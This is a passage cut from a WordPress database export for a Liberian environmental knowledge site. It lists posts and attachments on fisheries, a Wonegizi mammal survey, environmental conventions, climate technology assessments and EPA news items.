Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.\r\n\r\nThe overall fisheries sector goal is: Sustainably managed and economically viable fisheries that generate prosperity for the present and generations yet unborn.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:nafaa\" page_length=\"false\"]','National Fisheries & Aquaculture Authority','','inherit','closed','closed','','1588-revision-v1','','','2020-11-11 12:58:00','2020-11-11 12:58:00','',1588,'https://ekmsliberia.info/1588-revision-v1/',0,'revision','',0),(3223,42,'2020-11-11 13:12:22','2020-11-11 13:12:22','','giz','','inherit','open','closed','','giz','','','2020-11-11 13:12:22','2020-11-11 13:12:22','',2965,'https://ekmsliberia.info/wp-content/uploads/2020/02/giz.jpg',0,'attachment','image/jpeg',0),(3226,38,'2020-11-20 00:37:54','2020-11-20 00:37:54','EXECUTIVE SUMMARY\r\nA large mammal survey was carried out in Wonegizi from 21.11.-10.12.19 under FFI’s\r\nWonegizi REDD+ Project in order to provide baseline data against which biodiversity\r\nobjectives may be monitored, as well as to inform the project on the connectivity between\r\nZiama, Wonegizi and Wologizi PPAs for large mammals to understand how such species are\r\nmoving through the landscape and to provide recommendations for the establishment and\r\nmanagement of wildlife corridors.\r\nThe survey focused on 31 medium to large sized mammal species with an emphasis on\r\nindicator species of global conservation concern. A combination of data collection methods\r\nwas used, including desk review, interview surveys, reconnaissance surveys, HCV-species\r\ntargeted surveys, as well as Forest Elephant and Pygmy Hippo dung sample collection. Field\r\nsurveys were carried out in two different study areas, one in central Wonegizi and one in the\r\nnorthern part of the PPA. For the corridor assessment potential sites were identified per\r\nsatellite imagery and evaluated in the field through local information and ground-truthing of\r\nforest cover, connectivity, extent of human impact and forest degradation.\r\nThe resident large mammal fauna of Wonegizi consists of 24 species, including the Western\r\nChimpanzee, seven monkey species, the Forest Elephant, Pygmy Hippo, Leopard, African\r\nGolden Cat, Bongo, Bushbuck, five duiker species, the Water Chevrotain, Red River Hog,\r\nGiant Ground Pangolin, Black-bellied and White-bellied Pangolin. Another four species, i.e.\r\nthe Putty-nosed Monkey, Green Monkey, Forest Buffalo and Zebra Duiker might be present\r\nas well, but uncommon, i.e. either occur only occasionally and localized, or being very rare if\r\nnot already extinct today. The forest profile of Wonegizi generally is dominated by small to\r\nmedium sized trees and largely lacks a contiguous closed high canopy, hence it is not the\r\nmost suitable habitat for “High Forest”-dependent species such as the Red Colobus Monkey,\r\nKing Colobus and Diana Monkey, which appear to be rare and restricted to specific areas in\r\nWonegizi. The Jentink’s Duiker, another High Forest species, is absent from Wonegizi.','LARGE MAMMAL RAPID BIODIVERSITY ASSESSMENT in the Wonegizi REDD+ Project Site','','publish','closed','closed','','large-mammal-rapid-biodiversity-assessment-in-the-wonegizi-redd-project-site-2','','','2022-12-06 10:55:04','2022-12-06 10:55:04','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3226',128,'document','',0),(3227,38,'2020-11-20 00:33:12','2020-11-20 00:33:12','A large mammal survey was carried out in Wonegizi from 21.11.-10.12.19 under FFI’s\nWonegizi REDD+ Project in order to provide baseline data against which biodiversity\nobjectives may be monitored, as well as to inform the project on the connectivity between\nZiama, Wonegizi and Wologizi PPAs for large mammals to understand how such species are\nmoving through the landscape and to provide recommendations for the establishment and\nmanagement of wildlife corridors.','NORADLargeMammalSurveyWonegizi (1)','FFI','inherit','open','closed','','noradlargemammalsurveywonegizi-1','','','2020-11-20 00:33:48','2020-11-20 00:33:48','',3226,'https://ekmsliberia.info/wp-content/uploads/2020/11/NORADLargeMammalSurveyWonegizi-1.pdf',0,'attachment','application/pdf',0),(3229,42,'2020-11-20 14:33:53','2020-11-20 14:33:53','A presentation by Dr. Mary Molokwu-Odozi on Piloting REDD+ in the Wonegizi Proposed Protected Area','Piloting REDD+ in the Wonegizi Proposed Protected Area: Community Benefits','','publish','closed','closed','','piloting-redd-in-the-wonegizi-proposed-protected-area-community-benefits','','','2021-03-12 13:19:55','2021-03-12 13:19:55','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3229',97,'document','',0),(3230,42,'2020-11-20 14:29:00','2020-11-20 14:29:00','','Piloting REDD+ in the Wonegizi proposed Protected Area-Community Benefits','','inherit','open','closed','','piloting-redd-in-the-wonegizi-proposed-protected-area-community-benefits','','','2020-11-20 14:29:00','2020-11-20 14:29:00','',3229,'https://ekmsliberia.info/wp-content/uploads/2020/11/Piloting-REDD-in-the-Wonegizi-proposed-Protected-Area-Community-Benefits.pdf',0,'attachment','application/pdf',0),(3231,42,'2020-11-20 14:38:56','2020-11-20 14:38:56','A presentation done by Dr. Mary Molokwu-Odozi on Piloting REDD+ in the Wonegizi Proposed Protected Area','Piloting REDD+ in the Wonegizi Proposed Protected Area: Community Benefits','','inherit','closed','closed','','3229-autosave-v1','','','2020-11-20 14:38:56','2020-11-20 14:38:56','',3229,'https://ekmsliberia.info/3229-autosave-v1/',0,'revision','',0),(3235,42,'2021-03-19 14:27:33','0000-00-00 00:00:00','<!-- wp:shortcode -->\n[zoom_api_link meeting_id=\"81554496996\" link_only=\"no\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>           </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[zoom_list_meetings per_page=\"5\" category=\"test,test2,test3\" order=\"ASC\" type=\"upcoming\" filter=\"no\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>          </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[zoom_list_webinars per_page=\"5\" category=\"test,test2,test3\" order=\"ASC\" type=\"upcoming\" filter=\"no\"]\n<!-- /wp:shortcode -->','Online Meetings','','draft','closed','closed','','','','','2021-03-19 14:27:33','2021-03-19 14:27:33','',0,'https://ekmsliberia.info/?page_id=3235',0,'page','',0),(3236,42,'2020-11-24 10:30:51','2020-11-24 10:30:51','','Online Meetings','','inherit','closed','closed','','3235-revision-v1','','','2020-11-24 10:30:51','2020-11-24 10:30:51','',3235,'https://ekmsliberia.info/3235-revision-v1/',0,'revision','',0),(3237,42,'2020-11-24 10:32:11','2020-11-24 10:32:11','<!-- wp:paragraph -->\n<p>                 <code>[zoom_api_link meeting_id=\"123456789\" link_only=\"no\"]</code>              </p>\n<!-- /wp:paragraph -->','Online Meetings','','inherit','closed','closed','','3235-revision-v1','','','2020-11-24 10:32:11','2020-11-24 10:32:11','',3235,'https://ekmsliberia.info/3235-revision-v1/',0,'revision','',0),(3240,42,'2020-12-02 10:04:23','2020-12-02 10:04:23','The Nagoya Protocol on Access to Genetic Resources and the Fair and Equitable Sharing of Benefits Arising from their Utilization is a supplementary agreement to the CBD and supports the implementation of one of its three objectives: the fair and equitable sharing of benefits arising from the utilization of genetic resource.','Overview of  Liberia and the ABS Protocol Implementation in Liberia','','publish','closed','closed','','overview-of-liberia-and-the-abs-protocol-implementation-in-liberia','','','2021-03-12 13:23:17','2021-03-12 13:23:17','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3240',98,'document','',0),(3241,42,'2020-12-02 09:54:31','2020-12-02 09:54:31','','ABS Liberia','','inherit','open','closed','','abs-liberia','','','2020-12-02 09:54:31','2020-12-02 09:54:31','',3240,'https://ekmsliberia.info/wp-content/uploads/2020/12/ABS-Liberia.pptx',0,'attachment','application/vnd.openxmlformats-officedocument.presentationml.presentation',0),(3242,42,'2020-12-02 09:59:44','2020-12-02 09:59:44','','ABS Liberia','','inherit','open','closed','','abs-liberia-2','','','2020-12-02 09:59:44','2020-12-02 09:59:44','',3240,'https://ekmsliberia.info/wp-content/uploads/2020/12/ABS-Liberia.pdf',0,'attachment','application/pdf',0),(3243,42,'2020-12-02 11:28:03','2020-12-02 11:28:03','Action for Climate Empowerment (ACE) is a term adopted by the United Nations Framework Convention on Climate Change (UNFCCC) to denote work under Article 6 of the Convention (1992) and Article 12 of the Paris Agreement.','The Perspective of the Action for Climate Empowerment (ACE)','','publish','closed','closed','','the-perspective-of-the-action-for-climate-empowerment-ace','','','2021-03-12 13:27:37','2021-03-12 13:27:37','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3243',99,'document','',0),(3244,42,'2020-12-02 11:26:51','2020-12-02 11:26:51','','ACE','','inherit','open','closed','','ace','','','2020-12-02 11:26:51','2020-12-02 11:26:51','',3243,'https://ekmsliberia.info/wp-content/uploads/2020/12/ACE.pdf',0,'attachment','application/pdf',0),(3245,42,'2020-12-02 11:37:10','2020-12-02 11:37:10','The Cartagena Protocol on Bio-safety is one of the Protocols to the Convention on Biological Diversity. It was adopted by the Conference of the Parties to the Convention on 29 January 2000 as a supplementary agreement to the Convention on Biological Diversity','An Overview of the Cartagena Protocol','','publish','closed','closed','','an-overview-of-the-catagena-protocol','','','2021-03-12 13:30:47','2021-03-12 13:30:47','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3245',100,'document','',0),(3246,42,'2020-12-02 11:35:55','2020-12-02 11:35:55','','An Overview of the Catagena Protocol','','inherit','open','closed','','an-overview-of-the-catagena-protocol','','','2020-12-02 11:35:55','2020-12-02 11:35:55','',3245,'https://ekmsliberia.info/wp-content/uploads/2020/12/An-Overview-of-the-Catagena-Protocol.pdf',0,'attachment','application/pdf',0),(3247,42,'2020-12-02 11:41:31','2020-12-02 11:41:31','Global agreement on hazardous wastes and other wastes','Basel Convention on the Control of Transboundary Movements of Hazardous Wastes and their Disposal','','publish','closed','closed','','basel-convention-on-the-control-of-transboundary-movements-of-hazardous-wastes-and-their-disposal','','','2022-12-06 11:10:00','2022-12-06 11:10:00','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3247',114,'document','',0),(3248,42,'2020-12-02 11:39:42','2020-12-02 11:39:42','','BC Overview _Jeff Buchanan','','inherit','open','closed','','bc-overview-_jeff-buchanan','','','2020-12-02 11:39:42','2020-12-02 11:39:42','',3247,'https://ekmsliberia.info/wp-content/uploads/2020/12/BC-Overview-_Jeff-Buchanan.pdf',0,'attachment','application/pdf',0),(3249,42,'2020-12-02 13:43:51','2020-12-02 13:43:51','UN Framework Convention on Climate Change (UNFCCC), established from the Rio earth summit (1992) is about what can be done to reduce global warming and to cope with whatever temperature increases are inevitable.','Perspective of the UNFCCC','','publish','closed','closed','','https-ekmsliberia-info-wp-content-uploads-2020-12-best-practice-under-the-unfccc-2-pdf','','','2021-03-12 13:32:43','2021-03-12 13:32:43','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3249',101,'document','',0),(3250,42,'2020-12-02 13:42:11','2020-12-02 13:42:11','','BEST PRACTICE UNDER THE UNFCCC 2','','inherit','open','closed','','best-practice-under-the-unfccc-2','','','2020-12-02 13:42:11','2020-12-02 13:42:11','',3249,'https://ekmsliberia.info/wp-content/uploads/2020/12/BEST-PRACTICE-UNDER-THE-UNFCCC-2.pdf',0,'attachment','application/pdf',0),(3251,42,'2020-12-02 13:48:57','2020-12-02 13:48:57','Liberia is rich in biological diversity, while its dependence on this natural heritage is high, too. In addition to domestic use, many wildlife species are use for food whiles others  are use for medicine in great demand for international trade which may threaten the survival of these species in the wild.','Convention on International Trade in Endangered Species of Wild Fauna and Flora','','publish','closed','closed','','https-ekmsliberia-info-wp-content-uploads-2020-12-brief-of-cites-and-its-implementation-in-liberia-pdf','','','2021-03-12 13:34:39','2021-03-12 13:34:39','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3251',102,'document','',0),(3252,42,'2020-12-02 13:47:59','2020-12-02 13:47:59','','BRIEF OF CITES AND ITS IMPLEMENTATION IN LIBERIA','','inherit','open','closed','','brief-of-cites-and-its-implementation-in-liberia','','','2020-12-02 13:47:59','2020-12-02 13:47:59','',3251,'https://ekmsliberia.info/wp-content/uploads/2020/12/BRIEF-OF-CITES-AND-ITS-IMPLEMENTATION-IN-LIBERIA.pdf',0,'attachment','application/pdf',0),(3253,42,'2020-12-03 15:21:54','2020-12-03 15:21:54','As part of the process to ensure coordination amongst focal areas of Multilateral Environmental Agreements, through synergies and awareness; a two day’s workshop has being convene to solicit the involvement of Focal Points to provide brief on the protocols and status of Liberia relative to these conventions.','Status of Liberia Implementation Minamata Convention on Mercury','','publish','closed','closed','','https-ekmsliberia-info-wp-content-uploads-2020-12-brief-on-the-minamata-convention-on-mercury-pdf','','','2021-03-12 13:36:32','2021-03-12 13:36:32','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3253',103,'document','',0),(3256,42,'2020-12-03 15:19:11','2020-12-03 15:19:11','','Brief on the Minamata Convention on Mercury','','inherit','open','closed','','brief-on-the-minamata-convention-on-mercury','','','2020-12-03 15:19:11','2020-12-03 15:19:11','',3253,'https://ekmsliberia.info/wp-content/uploads/2020/12/Brief-on-the-Minamata-Convention-on-Mercury.pdf',0,'attachment','application/pdf',0),(3257,42,'2020-12-03 15:24:56','2020-12-03 15:24:56','The Convention on Biological Diversity (CBD) is one of the three conventions that make up the Rio Conventions.','Overview of the CBD','','publish','closed','closed','','overview-of-the-cbd','','','2021-09-08 00:27:29','2021-09-08 00:27:29','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3257',104,'document','',0),(3258,42,'2020-12-03 15:23:40','2020-12-03 15:23:40','','CBD buchanan november 26','','inherit','open','closed','','cbd-buchanan-november-26','','','2020-12-03 15:23:40','2020-12-03 15:23:40','',3257,'https://ekmsliberia.info/wp-content/uploads/2020/12/CBD-buchanan-november-26.pdf',0,'attachment','application/pdf',0),(3259,42,'2020-12-03 15:33:10','2020-12-03 15:33:10','The Climate and Clean Air Coalition to Reduce Short-Lived Climate Pollutants (CCAC) was launched by the United Nations Environment Programme (UNEP) and six countries — Bangladesh, Canada, Ghana, Mexico, Sweden, and the United States on 16 February 2012','Climate and Clean Air Coalition (CCAC)','','publish','closed','closed','','climate-and-clean-air-coalition-ccac','','','2021-03-12 13:57:44','2021-03-12 13:57:44','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3259',105,'document','',0),(3260,42,'2020-12-03 15:32:15','2020-12-03 15:32:15','','CCAC Presentation','','inherit','open','closed','','ccac-presentation','','','2020-12-03 15:32:15','2020-12-03 15:32:15','',3259,'https://ekmsliberia.info/wp-content/uploads/2020/12/CCAC-Presentation.pdf',0,'attachment','application/pdf',0),(3261,42,'2020-12-03 15:37:15','2020-12-03 15:37:15','Conservation of Migratory Species of Wild Animals is an international treaty, under the United Nations Environment Programme (UNEP). It aims to conserve terrestrial, marine and avian migratory species throughout their range. It is concerned with the conservation of wildlife and habitats on a global scale.','A Perspective of the Convention on Migratory Species (CMS)','','publish','closed','closed','','a-perspective-of-the-convention-on-migratory-species-cms','','','2021-08-18 13:20:21','2021-08-18 13:20:21','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3261',106,'document','',0),(3262,42,'2020-12-03 15:36:31','2020-12-03 15:36:31','','CMS','','inherit','open','closed','','cms','','','2020-12-03 15:36:31','2020-12-03 15:36:31','',3261,'https://ekmsliberia.info/wp-content/uploads/2020/12/CMS.pdf',0,'attachment','application/pdf',0),(3263,42,'2020-12-04 11:44:46','2020-12-04 11:44:46','In Liberia, Gender has been in action for sometime now but it has become more laudable when the position of Gender and Climate Focal Point decision was reached at COP22, decision 21 paragraph 22. Liberia nominated her Gender and Climate Change Focal Point at COP-24.','Brief Overview of The Post: Gender and Climate Change Focal Point','','publish','closed','closed','','brief-overview-of-the-post-gender-and-climate-change-focal-point','','','2021-03-12 14:07:42','2021-03-12 14:07:42','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3263',107,'document','',0),(3264,42,'2020-12-04 11:43:47','2020-12-04 11:43:47','','GCC','','inherit','open','closed','','gcc','','','2020-12-04 11:43:47','2020-12-04 11:43:47','',3263,'https://ekmsliberia.info/wp-content/uploads/2020/12/GCC.pdf',0,'attachment','application/pdf',0),(3265,42,'2020-12-04 11:47:12','2020-12-04 11:47:12','The Montreal Protocol on Substances that Deplete the Ozone Layer is a land mark agreement that identified the major ozone depleting substances (ODS) and established a time table for their eventual phase out.','Montreal Protocol on Substances that Deplete the Ozone Layer','','publish','closed','closed','','montreal-protocol-on-substances-that-deplete-the-ozone-layer','','','2022-12-06 11:04:02','2022-12-06 11:04:02','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3265',108,'document','',0),(3266,42,'2020-12-04 11:46:33','2020-12-04 11:46:33','','Ozone','','inherit','open','closed','','ozone','','','2020-12-04 11:46:33','2020-12-04 11:46:33','',3265,'https://ekmsliberia.info/wp-content/uploads/2020/12/Ozone.pdf',0,'attachment','application/pdf',0),(3267,42,'2020-12-04 11:49:40','2020-12-04 11:49:40','The Capacity Building Initiative for Transparency( CBIT)<b>, </b>came into fruition as a result of the  Paris Agreement on Climate Change which primarily  rests upon a foundation of Nationally Determined Contributions (NDCs) originally submitted by Parties to the Convention in 2015, and formally adopted on November 4, 2016.','An Overview of Liberia’s Capacity Building Initiative for Transparency (CBIT)','','publish','closed','closed','','an-overview-of-liberias-capacity-building-initiative-for-transparency-cbit','','','2022-12-06 11:04:25','2022-12-06 11:04:25','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3267',109,'document','',0),(3268,42,'2020-12-04 11:49:03','2020-12-04 11:49:03','','Presentation CBIT RIO Convention Workshop Buchanan','','inherit','open','closed','','presentation-cbit-rio-convention-workshop-buchanan','','','2020-12-04 11:49:03','2020-12-04 11:49:03','',3267,'https://ekmsliberia.info/wp-content/uploads/2020/12/Presentation-CBIT-RIO-Convention-Workshop-Buchanan.pdf',0,'attachment','application/pdf',0),(3269,42,'2020-12-04 11:52:12','2020-12-04 11:52:12','The Stockholm Convention was adopted by the Conference of Plenipotentiaries on 22 May 2001 in the City of Stockholm, Sweden.','Implementation of Stockholm Convention in Liberia','','publish','closed','closed','','implementation-of-stockholm-convention-in-liberia','','','2022-12-06 11:04:49','2022-12-06 11:04:49','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3269',110,'document','',0),(3270,42,'2020-12-04 11:51:31','2020-12-04 11:51:31','','Stockholm Convention','','inherit','open','closed','','stockholm-convention','','','2020-12-04 11:51:31','2020-12-04 11:51:31','',3269,'https://ekmsliberia.info/wp-content/uploads/2020/12/Stockholm-Convention.pdf',0,'attachment','application/pdf',0),(3271,42,'2020-12-04 11:54:46','2020-12-04 11:54:46','An intergovernmental treaty for the protection and sustainable use of wetlands in general and Ramsar Sites in particular','The RAMSAR Convention','','publish','closed','closed','','the-ramsar-convention','','','2021-08-19 12:11:39','2021-08-19 12:11:39','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3271',111,'document','',0),(3272,42,'2020-12-04 11:54:09','2020-12-04 11:54:09','','THE RAMSAR CONVENTION','','inherit','open','closed','','the-ramsar-convention','','','2020-12-04 11:54:09','2020-12-04 11:54:09','',3271,'https://ekmsliberia.info/wp-content/uploads/2020/12/THE-RAMSAR-CONVENTION.pdf',0,'attachment','application/pdf',0),(3273,42,'2020-12-04 11:57:16','2020-12-04 11:57:16','Technology Needs Assessments are a set of activities that identify and analyze climate change mitigation and adaptation technology priorities of developing countries.','Technology Needs Assessment Project','','publish','closed','closed','','technology-needs-assessment-project','','','2022-12-06 11:05:18','2022-12-06 11:05:18','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3273',112,'document','',0),(3274,42,'2020-12-04 11:56:39','2020-12-04 11:56:39','','TNA PROJECT','','inherit','open','closed','','tna-project','','','2020-12-04 11:56:39','2020-12-04 11:56:39','',3273,'https://ekmsliberia.info/wp-content/uploads/2020/12/TNA-PROJECT.pdf',0,'attachment','application/pdf',0),(3275,42,'2020-12-07 15:20:24','2020-12-07 15:20:24','Established in 1994, UNCCD is the sole legally-binding international agreement linking environment and development to sustainable land management.','Overview of The UNCCD, and Implementation in Liberia','','publish','closed','closed','','overview-of-the-unccd-and-implementation-in-liberia','','','2022-12-06 11:06:19','2022-12-06 11:06:19','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3275',113,'document','',0),(3276,42,'2020-12-04 11:59:25','2020-12-04 11:59:25','','UNCCD INTRO_CCCD_BUCHANAN_26112020','','inherit','open','closed','','unccd-intro_cccd_buchanan_26112020','','','2020-12-04 11:59:25','2020-12-04 11:59:25','',3275,'https://ekmsliberia.info/wp-content/uploads/2020/12/UNCCD-INTRO_CCCD_BUCHANAN_26112020.pdf',0,'attachment','application/pdf',0),(3278,42,'2020-12-09 10:57:20','2020-12-09 10:57:20','he TeTchnology Needs Assessment (TNA) for climate change adaptation in Liberia has been a set of activities to identify and determine the adaptation technology priorities of the country. TNAs are central to the work of the Parties to the Convention (Article 4.5 UNFCCC).','Coastal Zone\'s Technology Needs Assessment for Climate Change Adaptation','','publish','closed','closed','','coastal-zones-technology-needs-assessment-for-climate-change-adaptation-2','','','2021-03-12 13:17:16','2021-03-12 13:17:16','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3278',96,'document','',0),(3279,42,'2020-12-09 10:51:31','2020-12-09 10:51:31','','tna-report-coastal-zone-liberia','','inherit','open','closed','','tna-report-coastal-zone-liberia-2','','','2020-12-09 10:51:31','2020-12-09 10:51:31','',3278,'https://ekmsliberia.info/wp-content/uploads/2020/12/tna-report-coastal-zone-liberia.pdf',0,'attachment','application/pdf',0),(3280,42,'2020-12-09 11:05:50','2020-12-09 11:05:50','This report focuses on the TNA process which was carried out in Liberia to identify and prioritize, through country-driven participatory processes, technologies for mitigation aimed at reducing the greenhouse gas (GHG) emissions in the country‟s energy sector.','Technology Needs Assessment Report Mitigation','','publish','closed','closed','','technology-needs-assessment-report-mitigation','','','2022-12-07 15:00:25','2022-12-07 15:00:25','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3280',95,'document','',0),(3281,42,'2020-12-09 11:01:54','2020-12-09 11:01:54','','liberia-technology-needs-assessment-for-the-energy-sector','','inherit','open','closed','','liberia-technology-needs-assessment-for-the-energy-sector','','','2020-12-09 11:01:54','2020-12-09 11:01:54','',3280,'https://ekmsliberia.info/wp-content/uploads/2020/12/liberia-technology-needs-assessment-for-the-energy-sector.pdf',0,'attachment','application/pdf',0),(3282,42,'2020-12-09 11:11:33','2020-12-09 11:11:33','This TNA report presents technology needs for adaptation in the agriculture sector. A multi-stakeholder process (MSP) has been adopted for the identification and prioritisation of technological options using a linear additive Multiple Criteria Analysis (MCA) framework. All relevant information for prioritising technologies was provided in Technology Fact Sheets. The criteria proposed by MCA4Climate were used in MCA, and indicators were defined by local stakeholders.','Technology Needs Assessment Agriculture Report','','publish','closed','closed','','technology-needs-assessment-agriculture-report','','','2022-12-07 15:01:03','2022-12-07 15:01:03','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3282',94,'document','',0),(3283,42,'2020-12-09 11:09:11','2020-12-09 11:09:11','','tna-agriculture-report-liberia','','inherit','open','closed','','tna-agriculture-report-liberia-3','','','2020-12-09 11:09:11','2020-12-09 11:09:11','',3282,'https://ekmsliberia.info/wp-content/uploads/2020/12/tna-agriculture-report-liberia.pdf',0,'attachment','application/pdf',0),(3285,42,'2020-12-09 11:17:01','2020-12-09 11:17:01','This TNA’s second report, Barrier Analysis and Enabling Framework (BA&amp;EF) on Liberia’s coastal zone, assesses the potential barriers that could impede the transfer and diffusion of the technologies. As well, it provides an enabling framework or possible measures to overcome the identified barriers to the transfer and diffusion of the above technologies','Barrier Analysis & Enabling Framework for the Diffusion of Climate Change Coastal Zone’s Adaptation Technologies','','publish','closed','closed','','barrier-analysis-enabling-framework-for-the-diffusion-of-climate-change-coastal-zones-adaptation-technologies','','','2022-12-07 14:58:56','2022-12-07 14:58:56','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3285',93,'document','',0),(3286,42,'2020-12-09 11:15:04','2020-12-09 11:15:04','','liberia-coastal-zone-baef-report','','inherit','open','closed','','liberia-coastal-zone-baef-report','','','2020-12-09 11:15:04','2020-12-09 11:15:04','',3285,'https://ekmsliberia.info/wp-content/uploads/2020/12/liberia-coastal-zone-baef-report.pdf',0,'attachment','application/pdf',0),(3287,42,'2020-12-09 11:23:34','2020-12-09 11:23:34','This report is solely addressing barriers to these technologies using the Barrier Analysis and Enabling Framework (BA&amp;EF) to assess potential barriers that could impede the transfer and diffusion of the three technologies and in addition, provide the enabling framework or possible measures to overcome the identified barriers to the transfer and diffusion of the above technologies for the agriculture sector of Liberia.','Barrier Analysis & Enabling Framework Report for the Adaptation Sector – Agriculture Sector','','publish','closed','closed','','barrier-analysis-enabling-framework-report-for-the-adaptation-sector-agriculture-sector','','','2021-08-17 11:57:48','2021-08-17 11:57:48','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3287',91,'document','',0),(3288,42,'2020-12-09 11:21:56','2020-12-09 11:21:56','','tna-agriculture-baef-report-liberia','','inherit','open','closed','','tna-agriculture-baef-report-liberia','','','2020-12-09 11:21:56','2020-12-09 11:21:56','',3287,'https://ekmsliberia.info/wp-content/uploads/2020/12/tna-agriculture-baef-report-liberia.pdf',0,'attachment','application/pdf',0),(3290,42,'2021-01-06 10:50:32','2021-01-06 10:50:32','<!-- wp:paragraph -->\n<p>The Conservation Unit of the Environmental Protection Agency of Liberia (EPA) on Monday, December 21, 2020 rescued a Black-Backed Duiker captured from the wild in Bong County, Central Liberia. The endangered animal species was being sold by one Jeremiah Forkpa in Sinkor for US$ 45.00, when Madam Danise Love Dennis, an employee of the EPA pretended she wanted to purchase it. To avoid possible attack and resistance, Madam Dennis encouraged Forkpa to ride with her to her office where she had money to pay for the Black-Backed Duiker. Disappointingly for Forkpa, when they got to the office, Madam Dennis requested the assistance of staff of the Conservation Unit, who immediately seized the animal. Authorities of the Wildlife Section of the Forestry Development Authority (FDA), Wildlife Crime Taskforce and officers of Liberia National Police were immediately called to arrest Forkpa for violating the Wildlife Law of Liberia. Forkpa absconded when he asked to use the bathroom prior to the arrival of the police. The Wildlife Law of Liberia 2016 prohibits the hunting; eating and sale of protected animal species.The rescued Black-Backed Duiker would be turned over to authorities of Libassa Wildlife Sanctuary in Kpans Town, Marshall Highway in Margibi County, Hawa K. Walker, Assistant Manager of Conservation, EPA has disclosed. The Libassa Wildlife Sanctuary was established in collaboration with FDA and Libassa Ecolodge.</p>\n<!-- /wp:paragraph -->','EPA Rescues Black-Backed Duiker','','publish','open','open','','epa-rescues-black-backed-duiker','','','2021-01-06 10:53:27','2021-01-06 10:53:27','',0,'https://ekmsliberia.info/?p=3290',190,'post','',0),(3295,42,'2021-01-06 10:48:09','2021-01-06 10:48:09','','Black-Backed Duiker','','inherit','open','closed','','131987691_726085294699920_4200638508675567507_o','','','2021-01-06 10:48:30','2021-01-06 10:48:30','',3290,'https://ekmsliberia.info/wp-content/uploads/2021/01/131987691_726085294699920_4200638508675567507_o.jpg',0,'attachment','image/jpeg',0),(3296,42,'2021-01-06 10:49:35','2021-01-06 10:49:35','<!-- wp:paragraph -->\n<p>The Conservation Unit of the Environmental Protection Agency of Liberia (EPA) on Monday, December 21, 2020 rescued a Black-Backed Duiker captured from the wild in Bong County, Central Liberia. The endangered animal species was being sold by one Jeremiah Forkpa in Sinkor for US$ 45.00, when Madam Danise Love Dennis, an employee of the EPA pretended she wanted to purchase it. To avoid possible attack and resistance, Madam Dennis encouraged Forkpa to ride with her to her office where she had money to pay for the Black-Backed Duiker. Disappointingly for Forkpa, when they got to the office, Madam Dennis requested the assistance of staff of the Conservation Unit, who immediately seized the animal. Authorities of the Wildlife Section of the Forestry Development Authority (FDA), Wildlife Crime Taskforce and officers of Liberia National Police were immediately called to arrest Forkpa for violating the Wildlife Law of Liberia. Forkpa absconded when he asked to use the bathroom prior to the arrival of the police. The Wildlife Law of Liberia 2016 prohibits the hunting; eating and sale of protected animal species.The rescued Black-Backed Duiker would be turned over to authorities of Libassa Wildlife Sanctuary in Kpans Town, Marshall Highway in Margibi County, Hawa K. Walker, Assistant Manager of Conservation, EPA has disclosed. The Libassa Wildlife Sanctuary was established in collaboration with FDA and Libassa Ecolodge.</p>\n<!-- /wp:paragraph -->','EPA Rescues Black-Backed Duiker','','inherit','closed','closed','','3290-revision-v1','','','2021-01-06 10:49:35','2021-01-06 10:49:35','',3290,'https://ekmsliberia.info/3290-revision-v1/',0,'revision','',0),(3297,42,'2021-01-06 10:58:44','2021-01-06 10:58:44','<!-- wp:paragraph -->\n<p>The Ministry of Mines &amp; Energy in partnership with the Environmental Protection Agency of Liberia (EPA) is holding a one-day Technical Inception &amp; Consultative Workshop in Kakata, Margibi County on “Strengthening governance, human rights and environmental management for artisanal mining sector through user-friendly tools, awareness and capacity building”. The workshop is being held to kick off the Environmental Governance Project funded by UNDP in partnership with Swedish International Development Cooperation Agency (Sida) under the Environmental Governance Programme (EGP). It is intended to prepare an Artisanal Small-scale Mining user-friendly handbook, which would strengthen governance, human rights and environmental management for the artisanal mining sector in Liberia and as well create awareness on global environmental values.</p>\n<!-- /wp:paragraph -->','EPA, Ministry of Mines and Energy hold Training on the development of user friendly handbook for artisanal and small scale miners in Liberia.','','publish','open','open','','epa-ministry-of-mines-and-energy-hold-training-on-the-development-of-user-friendly-handbook-for-artisanal-and-small-scale-miners-in-liberia','','','2021-01-06 10:58:47','2021-01-06 10:58:47','',0,'https://ekmsliberia.info/?p=3297',189,'post','',0),(3298,42,'2021-01-06 10:56:44','2021-01-06 10:56:44','','','','inherit','open','closed','','epa-mee','','','2021-01-06 10:56:57','2021-01-06 10:56:57','',3297,'https://ekmsliberia.info/wp-content/uploads/2021/01/epa-mee.jpg',0,'attachment','image/jpeg',0),(3299,42,'2021-01-06 10:58:44','2021-01-06 10:58:44','<!-- wp:paragraph -->\n<p>The Ministry of Mines &amp; Energy in partnership with the Environmental Protection 